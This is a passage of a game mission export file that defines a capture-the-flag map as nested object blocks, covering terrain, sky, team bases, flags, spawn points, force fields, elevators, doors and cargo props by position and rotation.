//--- export object begin ---//
instant SimGroup "MissionGroup" {
	instant SimGroup "Volumes" {
		instant SimVolume "InterfaceVol" {
			fileName = "Interface.vol";
		};
		instant SimVolume "entities" {
			fileName = "Entities.vol";
		};
		instant SimVolume "World" {
			fileName = "lushWorld.vol";
		};
		instant SimVolume "WorldTerrain" {
			fileName = "lushTerrain.vol";
		};
		instant SimVolume "lushDML" {
			fileName = "lushDML.vol";
		};
		instant SimVolume "savanaDML" {
			fileName = "savanaDML.vol";
		};
		instant SimVolume "human1DML" {
			fileName = "human1DML.vol";
		};
		instant SimVolume "tedFile" {
			fileName = "Raindance.ted";
			locked = "true";
		};
	};
	instant SimGroup "World" {
		instant SimPalette "Palette" {
			fileName = "lush.night.ppl";
		};
		instant MissionCenterPos "MissionCenter" {
			x = "-256";
			y = "-256";
			w = "512";
			h = "512";
		};
	};
	instant SimGroup "Landscape" {
		instant Sky "Sky" {
			dmlName = "";
			skyColor = "0 0 0";
			hazeColor = "0 0 0";
			featurePosition = "0";
			size = "600";
			textures[0] = "0";
			textures[1] = "1";
			textures[2] = "2";
			textures[3] = "3";
			textures[4] = "4";
			textures[5] = "5";
			textures[6] = "6";
			textures[7] = "7";
			textures[8] = "8";
			textures[9] = "9";
			textures[10] = "10";
			textures[11] = "11";
			textures[12] = "12";
			textures[13] = "13";
			textures[14] = "14";
			textures[15] = "15";
		};
		instant StarField "stars1" {
			inFrontOfSky = "True";
			colors[0] = "0 0 0";
			colors[1] = "0 0 0";
			colors[2] = "1 1 0.899994";
		};
		instant Planet "Sun" {
			fileName = "";
			azimuth = "0";
			incidence = "60";
			castShadows = "True";
			useLensFlare = "False";
			intensity = "0 0 0";
			ambient = "0.149994 0.149994 0.149994";
			size = "2000";
			distance = "11000";
		};
		instant SimTerrain "Terrain" {
			tedFileName = "Raindance.dtf";
			visibleDistance = "400";
			hazeDistance = "250";
			hazeVerticalMin = "9.88127e-39";
			hazeVerticalMax = "8.10713e-39";
			perspectiveDistance = "100";
			screenSize = "61";
			contGravity = "0 0 -20";
			contDrag = "0";
			contHeight = "10000";
			position = "-768 -768 -1000";
			rotation = "0 0 0";
			terrainType = "flat";
		};
	};
	instant SimGroup "Lights";
	instant SimGroup "Teams" {
		instant TeamGroup "team0" {
			instant Item "flag" {
				dataBlock = "flag";
				name = "<vServer::teamName0> Flag";
				position = "-79 -75 7.00532";
				rotation = "0 0 0";
				destroyable = "True";
				deleteOnDestroy = "False";
				rotates = "False";
				collideable = "False";
				count = "1";
				objectiveLine = "13";
				locked = "0";
				scoreValue = "1";
				originalPosition = "-79 -75 7";
				atHome = "true";
				pickupSequence = "0";
				carrier = "-1";
				holdingTeam = "-1";
				enemyCaps = "0";
				caps0 = "0";
				caps1 = "0";
				caps2 = "0";
				caps3 = "0";
				caps4 = "0";
				caps5 = "0";
				caps6 = "0";
				caps7 = "0";
				changeTeamCount = "0";
			};
			instant SimGroup "DropPoints" {
				instant SimGroup "start" {
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "-79.1055 -81.0118 23.9988";
						rotation = "0 0 -0.78499";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "-52.4547 -79.8088 4";
						rotation = "0 0 -0.78499";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "-84.0908 -62.5068 4";
						rotation = "0 0 -0.78499";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "-75.7763 -50.9277 4";
						rotation = "0 0 -0.78499";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "-61.0698 -50.9914 4";
						rotation = "0 0 -0.78499";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "-67.2909 -59.5094 4";
						rotation = "0 0 -0.78499";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "-57.6072 -72.0047 4";
						rotation = "0 0 -0.78499";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "-56.0014 -61.3973 4";
						rotation = "0 0 -0.78499";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "-72.4161 -71.3402 7";
						rotation = "0 0 -0.78499";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "-78.0025 -72.0794 7";
						rotation = "0 0 -0.78499";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "-76.8392 -78.2434 7";
						rotation = "0 0 -0.78499";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "-72.9684 -78.3582 7";
						rotation = "0 0 -0.78499";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "-76.1414 -79.6758 23.9988";
						rotation = "0 0 -0.78499";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "-81.3944 -79.3886 23.9988";
						rotation = "0 0 -0.78499";
					};
				};
				instant SimGroup "Random" {
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "-79.1055 -81.0118 23.9988";
						rotation = "0 0 -0.78499";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "-52.4547 -79.8088 4";
						rotation = "0 0 -0.78499";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "-84.0908 -62.5068 4";
						rotation = "0 0 -0.78499";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "-75.7763 -50.9277 4";
						rotation = "0 0 -0.78499";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "-61.0698 -50.9914 4";
						rotation = "0 0 -0.78499";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "-67.2909 -59.5094 4";
						rotation = "0 0 -0.78499";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "-57.6072 -72.0047 4";
						rotation = "0 0 -0.78499";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "-56.0014 -61.3973 4";
						rotation = "0 0 -0.78499";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "-72.4161 -71.3402 7";
						rotation = "0 0 -0.78499";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "-78.0025 -72.0794 7";
						rotation = "0 0 -0.78499";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "-76.8392 -78.2434 7";
						rotation = "0 0 -0.78499";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "-72.9684 -78.3582 7";
						rotation = "0 0 -0.78499";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "-76.1414 -79.6758 23.9988";
						rotation = "0 0 -0.78499";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "-81.3944 -79.3886 23.9988";
						rotation = "0 0 -0.78499";
					};
				};
			};
			instant SimGroup "NegBase" {
				instant InteriorShape "SW_listening1" {
					fileName = "SW_Listening.dis";
					isContainer = "1";
					position = "-74.9985 -75 6.77094e-05";
					rotation = "0 0 0";
					lightParams = "12 1.600000 1 1.600000 1 1.600000 1 1.600000 1 1.600000 1 1.600000 1 1.600000 1 1.600000 1 1.600000 1 1.600000 1 1.600000 1 1.600000 1 ";
				};
				instant StaticShape "ForceField1" {
					dataBlock = "ForceField";
					name = "";
					position = "-77.9975 -82.6474 18.4985";
					rotation = "0 1.56934 0";
					destroyable = "True";
					deleteOnDestroy = "False";
					lastDamageObject = "2049";
					lastDamageTeam = "0";
				};
				instant StaticShape "ForceField1" {
					dataBlock = "ForceField";
					name = "";
					position = "-77.9976 -88.7476 18.9976";
					rotation = "0 1.56936 0";
					destroyable = "True";
					deleteOnDestroy = "False";
					lastDamageTeam = "1";
					lastDamageObject = "2049";
				};
				instant StaticShape "ForceField1" {
					dataBlock = "ForceField";
					name = "";
					position = "-77.9976 -88.7476 18.9976";
					rotation = "0 1.56944 1.56945";
					destroyable = "True";
					deleteOnDestroy = "False";
					lastDamageObject = "2049";
					lastDamageTeam = "0";
				};
				instant StaticShape "ForceField1" {
					dataBlock = "ForceField";
					name = "";
					position = "-77.9975 -88.7475 7";
					rotation = "0 1.56944 1.56945";
					destroyable = "True";
					deleteOnDestroy = "False";
					lastDamageTeam = "0";
					lastDamageObject = "2049";
				};
				instant StaticShape "ForceField1" {
					dataBlock = "ForceField";
					name = "";
					position = "-71.9985 -88.7476 18.9976";
					rotation = "0 1.56943 1.56944";
					destroyable = "True";
					deleteOnDestroy = "False";
					lastDamageObject = "2049";
					lastDamageTeam = "0";
				};
				instant StaticShape "ForceField1" {
					dataBlock = "ForceField";
					name = "";
					position = "-71.9985 -88.7475 7";
					rotation = "0 1.56942 1.56943";
					destroyable = "True";
					deleteOnDestroy = "False";
					lastDamageTeam = "0";
					lastDamageObject = "2049";
				};
				instant SimGroup "elevator4x4" {
					instant SimPath "Path1" {
						isLooping = "False";
						isCompressed = "False";
						instant Marker "Marker1" {
							dataBlock = "PathMarker";
							name = "";
							position = "-74.9985 -85.4985 4";
							rotation = "0 0 0";
						};
						instant Marker "Marker1" {
							dataBlock = "PathMarker";
							name = "";
							position = "-74.9985 -85.4985 24.4976";
							rotation = "0 0 0";
						};
					};
					instant Moveable "elevator_5x51" {
						dataBlock = "elevator5x5";
						name = "";
						position = "-74.9985 -85.4985 4";
						rotation = "0 0 0";
						destroyable = "True";
						deleteOnDestroy = "False";
						delayTime = "0";
						waypoint = "top";
						Status = "up";
					};
					instant StaticShape "Keypad11" {
						dataBlock = "Keypad1";
						name = "";
						position = "-74.8282 -77.3176 25";
						rotation = "-1.56768 0 0";
						destroyable = "True";
						deleteOnDestroy = "False";
						Door0 = "8268";
						numDoors = "1";
					};
				};
				instant InteriorShape "BELfloatingpad21" {
					fileName = "BELfloatingPad2.dis";
					isContainer = "1";
					position = "-21.5 -72 -1";
					rotation = "1.5707 0 -1.5707";
					lightParams = "24 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 ";
				};
				instant InteriorShape "BELfloatingpad21" {
					fileName = "BELfloatingPad2.dis";
					isContainer = "1";
					position = "-71.9984 -21.5 -1";
					rotation = "1.5707 0 0";
					lightParams = "24 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 ";
				};
				instant SimGroup "DoubleDoor6" {
					instant SimPath "Path1" {
						isLooping = "False";
						isCompressed = "False";
						instant Marker "Marker1" {
							dataBlock = "PathMarker";
							name = "";
							position = "-41.5 -49.4985 4";
							rotation = "0 -0 -0.78498";
						};
						instant Marker "Marker1" {
							dataBlock = "PathMarker";
							name = "";
							position = "-45.4985 -45.5 4";
							rotation = "0 -0 -0.784976";
						};
						instant Marker "Marker1" {
							dataBlock = "PathMarker";
							name = "";
							position = "-49.4985 -41.5 4";
							rotation = "0 -0 -0.78498";
						};
					};
					instant Moveable "DoorSixLeft1" {
						dataBlock = "DoorSixLeft";
						name = "";
						position = "-45.4985 -45.5 4";
						rotation = "0 0 -0.784976";
						destroyable = "True";
						deleteOnDestroy = "False";
						fadeTime = "0";
						center = "1";
						Status = "close";
						closeTime = "1";
					};
					instant Moveable "DoorSixRight1" {
						dataBlock = "DoorSixRight";
						name = "";
						position = "-45.4985 -45.5 4";
						rotation = "0 0 -0.784976";
						destroyable = "True";
						deleteOnDestroy = "False";
						fadeTime = "0";
						center = "1";
						Status = "close";
						closeTime = "1";
					};
					instant StaticShape "Keypad11" {
						dataBlock = "Keypad1";
						name = "";
						position = "-43.5489 -57 5.6433";
						rotation = "0 -0 1.56984";
						destroyable = "True";
						deleteOnDestroy = "False";
						Door1 = "8278";
						Door0 = "8277";
						numDoors = "2";
					};
				};
				instant InteriorShape "logo31" {
					fileName = "logo3.dis";
					isContainer = "1";
					position = "-42 -48 13";
					rotation = "0 1.5707 2.3561";
					lightParams = "0 ";
				};
			};
			instant StaticShape "Generator1" {
				dataBlock = "Generator";
				name = "";
				position = "0 0 -10000";
				rotation = "0 0 0";
				destroyable = "True";
				deleteOnDestroy = "False";
			};
		};
		instant TeamGroup "team1" {
			instant Item "flag" {
				dataBlock = "flag";
				name = "<vServer::teamName1> Flag";
				position = "79 75 7.00532";
				rotation = "0 0 0";
				destroyable = "True";
				deleteOnDestroy = "False";
				rotates = "False";
				collideable = "False";
				count = "1";
				objectiveLine = "14";
				locked = "0";
				scoreValue = "1";
				originalPosition = "79 75 7";
				atHome = "true";
				pickupSequence = "0";
				carrier = "-1";
				holdingTeam = "-1";
				enemyCaps = "0";
				caps0 = "0";
				caps1 = "0";
				caps2 = "0";
				caps3 = "0";
				caps4 = "0";
				caps5 = "0";
				caps6 = "0";
				caps7 = "0";
				changeTeamCount = "0";
			};
			instant SimGroup "DropPoints" {
				instant SimGroup "start" {
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "56.3579 61.7849 4";
						rotation = "0 0 2.3559";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "88.6289 72.2103 4";
						rotation = "0 0 2.3559";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "78.7843 76.1287 24";
						rotation = "0 0 2.3559";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "80.9652 79.546 24";
						rotation = "0 0 2.3559";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "77.4722 79.5099 24";
						rotation = "0 0 2.3559";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "71.0849 71.4268 7";
						rotation = "0 0 2.3559";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "77.1576 72.2808 7";
						rotation = "0 0 2.3559";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "78.3723 77.4881 7";
						rotation = "0 0 2.3559";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "71.4589 76.1666 7";
						rotation = "0 0 2.3559";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "59.3332 51.8637 4";
						rotation = "0 0 2.3559";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "75.5036 49.7518 4";
						rotation = "0 0 2.3559";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "84.5228 55.1826 4";
						rotation = "0 0 2.3559";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "68.2311 58.0094 4";
						rotation = "0 0 2.3559";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "62.7409 77.4414 4";
						rotation = "0 0 2.3559";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "53.8592 79.2441 4";
						rotation = "0 0 2.3559";
					};
				};
				instant SimGroup "Random" {
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "56.3579 61.7849 4";
						rotation = "0 0 2.3559";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "88.6289 72.2103 4";
						rotation = "0 0 2.3559";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "78.7843 76.1287 24";
						rotation = "0 0 2.3559";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "80.9652 79.546 24";
						rotation = "0 0 2.3559";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "77.4722 79.5099 24";
						rotation = "0 0 2.3559";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "71.0849 71.4268 7";
						rotation = "0 0 2.3559";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "77.1576 72.2808 7";
						rotation = "0 0 2.3559";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "78.3723 77.4881 7";
						rotation = "0 0 2.3559";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "71.4589 76.1666 7";
						rotation = "0 0 2.3559";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "59.3332 51.8637 4";
						rotation = "0 0 2.3559";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "75.5036 49.7518 4";
						rotation = "0 0 2.3559";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "84.5228 55.1826 4";
						rotation = "0 0 2.3559";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "68.2311 58.0094 4";
						rotation = "0 0 2.3559";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "62.7409 77.4414 4";
						rotation = "0 0 2.3559";
					};
					instant Marker "Drop Point1" {
						dataBlock = "DropPointMarker";
						name = "";
						position = "53.8592 79.2441 4";
						rotation = "0 0 2.3559";
					};
				};
			};
			instant SimGroup "PosBase" {
				instant InteriorShape "SW_listening1" {
					fileName = "SW_Listening.dis";
					isContainer = "1";
					position = "75 75 0.000101075";
					rotation = "0 0 0";
					lightParams = "12 1.600000 1 1.600000 1 1.600000 1 1.600000 1 1.600000 1 1.600000 1 1.600000 1 1.600000 1 1.600000 1 1.600000 1 1.600000 1 1.600000 1 ";
				};
				instant StaticShape "ForceField1" {
					dataBlock = "ForceField";
					name = "";
					position = "77.9974 82.6473 18.4985";
					rotation = "0 1.56933 3.13976";
					destroyable = "True";
					deleteOnDestroy = "False";
					lastDamageObject = "2049";
					lastDamageTeam = "0";
				};
				instant StaticShape "ForceField1" {
					dataBlock = "ForceField";
					name = "";
					position = "77.9975 88.7475 18.9975";
					rotation = "0 1.56935 3.13977";
					destroyable = "True";
					deleteOnDestroy = "False";
					lastDamageTeam = "-1";
					lastDamageObject = "8252";
				};
				instant StaticShape "ForceField1" {
					dataBlock = "ForceField";
					name = "";
					position = "77.9975 88.7475 18.9975";
					rotation = "0 1.56943 -1.56944";
					destroyable = "True";
					deleteOnDestroy = "False";
					lastDamageObject = "8252";
					lastDamageTeam = "-1";
				};
				instant StaticShape "ForceField1" {
					dataBlock = "ForceField";
					name = "";
					position = "77.9974 88.7474 7";
					rotation = "0 1.56943 -1.56944";
					destroyable = "True";
					deleteOnDestroy = "False";
					lastDamageTeam = "0";
					lastDamageObject = "2049";
				};
				instant StaticShape "ForceField1" {
					dataBlock = "ForceField";
					name = "";
					position = "72 88.7475 18.9975";
					rotation = "0 1.56942 -1.56943";
					destroyable = "True";
					deleteOnDestroy = "False";
					lastDamageObject = "2049";
					lastDamageTeam = "0";
				};
				instant StaticShape "ForceField1" {
					dataBlock = "ForceField";
					name = "";
					position = "72 88.7474 7";
					rotation = "0 1.56941 -1.56942";
					destroyable = "True";
					deleteOnDestroy = "False";
					lastDamageTeam = "0";
					lastDamageObject = "2049";
				};
				instant SimGroup "elevator4x4" {
					instant SimPath "Path1" {
						isLooping = "False";
						isCompressed = "False";
						instant Marker "Marker1" {
							dataBlock = "PathMarker";
							name = "";
							position = "75 85.5 4";
							rotation = "0 0 0";
						};
						instant Marker "Marker1" {
							dataBlock = "PathMarker";
							name = "";
							position = "75 85.5 24.4984";
							rotation = "0 0 0";
						};
					};
					instant Moveable "elevator_5x51" {
						dataBlock = "elevator5x5";
						name = "";
						position = "75 85.5 4";
						rotation = "0 0 0";
						destroyable = "True";
						deleteOnDestroy = "False";
						delayTime = "0";
						waypoint = "top";
						Status = "up";
					};
					instant StaticShape "Keypad11" {
						dataBlock = "Keypad1";
						name = "";
						position = "74.8281 77.3175 25";
						rotation = "-1.56764 0 3.13992";
						destroyable = "True";
						deleteOnDestroy = "False";
						Door0 = "8329";
						numDoors = "1";
					};
				};
				instant InteriorShape "BELfloatingpad21" {
					fileName = "BELfloatingPad2.dis";
					isContainer = "1";
					position = "21.5 71.9981 -1";
					rotation = "1.5707 0 1.5707";
					lightParams = "24 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 ";
				};
				instant SimGroup "DoubleDoor6" {
					instant SimPath "Path1" {
						isLooping = "False";
						isCompressed = "False";
						instant Marker "Marker1" {
							dataBlock = "PathMarker";
							name = "";
							position = "49.4984 41.5 3.99985";
							rotation = "0 -0 -0.784978";
						};
						instant Marker "Marker1" {
							dataBlock = "PathMarker";
							name = "";
							position = "45.4984 45.5 3.99985";
							rotation = "0 -0 -0.784974";
						};
						instant Marker "Marker1" {
							dataBlock = "PathMarker";
							name = "";
							position = "41.5 49.4984 3.99985";
							rotation = "0 -0 -0.784978";
						};
					};
					instant Moveable "DoorSixLeft1" {
						dataBlock = "DoorSixLeft";
						name = "";
						position = "45.4984 45.5 3.99985";
						rotation = "0 0 -0.784974";
						destroyable = "True";
						deleteOnDestroy = "False";
						closeTime = "1";
						Status = "close";
						center = "1";
						fadeTime = "0";
					};
					instant Moveable "DoorSixRight1" {
						dataBlock = "DoorSixRight";
						name = "";
						position = "45.4984 45.5 3.99985";
						rotation = "0 0 -0.784974";
						destroyable = "True";
						deleteOnDestroy = "False";
						closeTime = "1";
						Status = "close";
						center = "1";
						fadeTime = "0";
					};
					instant StaticShape "Keypad11" {
						dataBlock = "Keypad1";
						name = "";
						position = "43.5492 57 5.64333";
						rotation = "0 -0 -1.56988";
						destroyable = "True";
						deleteOnDestroy = "False";
						numDoors = "2";
						Door0 = "8337";
						Door1 = "8338";
					};
				};
				instant InteriorShape "BELfloatingpad21" {
					fileName = "BELfloatingPad2.dis";
					isContainer = "1";
					position = "72 21.5 -1";
					rotation = "1.5707 0 3.1415";
					lightParams = "24 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 1.200000 1 ";
				};
				instant InteriorShape "logo31" {
					fileName = "logo3.dis";
					isContainer = "1";
					position = "42 48 13";
					rotation = "0 1.57069 -0.785388";
					lightParams = "0 ";
				};
			};
			instant StaticShape "Generator1" {
				dataBlock = "Generator";
				name = "";
				position = "0 0 -10000";
				rotation = "0 0 0";
				destroyable = "True";
				deleteOnDestroy = "False";
			};
		};
	};
	instant SimGroup "Stuff" {
		instant SimGroup "Ground" {
			instant InteriorShape "iblock1" {
				fileName = "iblock.dis";
				isContainer = "1";
				position = "-64 -64 0";
				rotation = "0 0 0";
				lightParams = "0 ";
			};
			instant InteriorShape "iblock1" {
				fileName = "iblock.dis";
				isContainer = "1";
				position = "0 -64 0";
				rotation = "0 0 0";
				lightParams = "0 ";
			};
			instant InteriorShape "iblock1" {
				fileName = "iblock.dis";
				isContainer = "1";
				position = "64 -64 0";
				rotation = "0 0 0";
				lightParams = "0 ";
			};
			instant InteriorShape "iblock1" {
				fileName = "iblock.dis";
				isContainer = "1";
				position = "-64 0 0";
				rotation = "0 0 0";
				lightParams = "0 ";
			};
			instant InteriorShape "iblock1" {
				fileName = "iblock.dis";
				isContainer = "1";
				position = "0 0 0";
				rotation = "0 0 0";
				lightParams = "0 ";
			};
			instant InteriorShape "iblock1" {
				fileName = "iblock.dis";
				isContainer = "1";
				position = "64 0 0";
				rotation = "0 0 0";
				lightParams = "0 ";
			};
			instant InteriorShape "iblock1" {
				fileName = "iblock.dis";
				isContainer = "1";
				position = "-64 64 0";
				rotation = "0 0 0";
				lightParams = "0 ";
			};
			instant InteriorShape "iblock1" {
				fileName = "iblock.dis";
				isContainer = "1";
				position = "0 64 0";
				rotation = "0 0 0";
				lightParams = "0 ";
			};
			instant InteriorShape "iblock1" {
				fileName = "iblock.dis";
				isContainer = "1";
				position = "64 64 0";
				rotation = "0 0 0";
				lightParams = "0 ";
			};
		};
		instant SimGroup "Boxes" {
			instant InteriorShape "DSlcargo21" {
				fileName = "DSLCargo2.dis";
				isContainer = "1";
				position = "-22.0004 10.8599 3.29999";
				rotation = "0 0 0.471238";
				lightParams = "8 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 ";
			};
			instant InteriorShape "SWlcargo21" {
				fileName = "SWLCargo2.dis";
				isContainer = "1";
				position = "-12.5148 30.8397 3.29999";
				rotation = "0 0 0.244346";
				lightParams = "8 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 ";
			};
			instant InteriorShape "lcargo21" {
				fileName = "Lcargo2.dis";
				isContainer = "0";
				position = "29.9956 3.75525 3.9999";
				rotation = "0 -0 1.71032";
				lightParams = "0 ";
			};
			instant InteriorShape "DSlcargo11" {
				fileName = "DSLCargo1.dis";
				isContainer = "0";
				position = "47.3433 1.46994 3.9999";
				rotation = "0 -0 2.6877";
				lightParams = "4 1.200000 1 1.200000 1 1.200000 1 1.200000 1 ";
			};
			instant InteriorShape "DSlcargo11" {
				fileName = "DSLCargo1.dis";
				isContainer = "0";
				position = "15.5958 10.4377 3.99989";
				rotation = "0 -0 1.79758";
				lightParams = "4 1.200000 1 1.200000 1 1.200000 1 1.200000 1 ";
			};
			instant InteriorShape "COPlcargo11" {
				fileName = "COPLCargo1.dis";
				isContainer = "0";
				position = "15.817 -16.6964 3.9999";
				rotation = "0 -0 0.209429";
				lightParams = "4 1.200000 1 1.200000 1 1.200000 1 1.200000 1 ";
			};
			instant InteriorShape "BElcargo21" {
				fileName = "BELCargo2.dis";
				isContainer = "1";
				position = "52.774 -26.7039 3.29999";
				rotation = "0 0 -0.453785";
				lightParams = "8 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 ";
			};
			instant InteriorShape "DSlcargo21" {
				fileName = "DSLCargo2.dis";
				isContainer = "1";
				position = "6.21719 -4.36811 3.29999";
				rotation = "0 0 2.30383";
				lightParams = "8 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 ";
			};
			instant InteriorShape "DSlcargo21" {
				fileName = "DSLCargo2.dis";
				isContainer = "1";
				position = "-19.2869 -25.0999 3.29999";
				rotation = "0 0 1.46607";
				lightParams = "8 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 ";
			};
			instant InteriorShape "BElcargo21" {
				fileName = "BELCargo2.dis";
				isContainer = "1";
				position = "20.8334 26.5661 3.29999";
				rotation = "0 0 0.645771";
				lightParams = "8 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 ";
			};
			instant InteriorShape "BElcargo21" {
				fileName = "BELCargo2.dis";
				isContainer = "1";
				position = "17.2543 -45.018 3.29999";
				rotation = "0 0 1.32645";
				lightParams = "8 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 ";
			};
			instant InteriorShape "BElcargo21" {
				fileName = "BELCargo2.dis";
				isContainer = "1";
				position = "-52.2833 -4.35302 3.29999";
				rotation = "0 0 2.21656";
				lightParams = "8 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 1.199999 1 ";
			};
		};
		instant SimGroup "Bridge" {
			instant InteriorShape "iobservation1" {
				fileName = "iobservation.dis";
				isContainer = "1";
				position = "-6.92818 -19.0245 -7.03458";
				rotation = "0 -0 -0.349055";
				lightParams = "0 ";
			};
			instant InteriorShape "catwalkA1" {
				fileName = "catwalkA.dis";
				isContainer = "1";
				position = "13.8449 37.914 -7.15204";
				rotation = "-0.349047 0 -0.34905";
				lightParams = "4 1.400000 1 1.400000 1 8.399998 1 8.399998 1 ";
			};
			instant InteriorShape "catwalkA1" {
				fileName = "catwalkA.dis";
				isContainer = "1";
				position = "-13.8507 -37.8777 -7.15077";
				rotation = "0.349052 0 -0.349053";
				lightParams = "4 1.400000 1 1.400000 1 8.399998 1 8.399998 1 ";
			};
			instant InteriorShape "catwalkA1" {
				fileName = "catwalkA.dis";
				isContainer = "1";
